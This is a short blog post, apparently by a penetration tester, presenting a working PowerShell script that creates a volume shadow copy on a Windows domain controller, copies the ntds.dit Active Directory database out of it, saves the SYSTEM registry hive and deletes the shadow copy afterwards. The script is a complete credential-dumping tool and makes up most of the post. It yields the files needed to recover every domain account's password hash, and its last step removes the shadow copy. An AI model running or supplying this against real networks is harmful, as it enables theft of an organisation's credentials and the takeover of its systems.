I wrote a post a awhile back on how to retrieve and crack active directory hashes but the entire process is manual.  I had this bright idea that I'd automate the Windows side of it using PowerShell.  In my mind, I had the general flow -- create a directory for the files, create a shadow copy, copy the ntds.dit file from the shadow copy, expert SYSTEM from the registry, and then clean up the mess after I get my files.  Funny thing happened, the part where I copy from the shadow copy didn't work.  Turns out, PowerShell doesn't all you (or doesn't easily allow you) to access the shadow copy.

At that point, I was sorted of committed to my approach and I called cmd.exe to get around the issue.  Seems kind of weird that PowerShell, a tool for administrators, is unable to copy items out of the shadow copy.  Anyway, my code is never elegant but it is functional:

Clear
$DirPath = 'C:\Hashes'
  If(!(test-path $DirPath))
  {
    New-Item -ItemType Directory -Force -Path $DirPath
  }
$String = (vssadmin Create Shadow /for=C:) | Out-String
$Regex = [Regex]::new("(?<={)(.*)(?=})")
$Match = $Regex.Match($String)           
$ShadowID = "{" + $Match.Value + "}"
$CopyNum = ($String -split '\\')[6]
$FullPath = $("\\?\GLOBALROOT\Device\") + $($CopyNum -Replace('\n','')) + $("\windows\ntds\ntds.dit")
$DestPath = "C:\Hashes"
cmd.exe /c "copy $FullPath c:\Hashes\"
reg SAVE HKLM\SYSTEM c:\Hashes\SYSTEM
vssadmin delete shadows /shadow=$ShadowID /quiet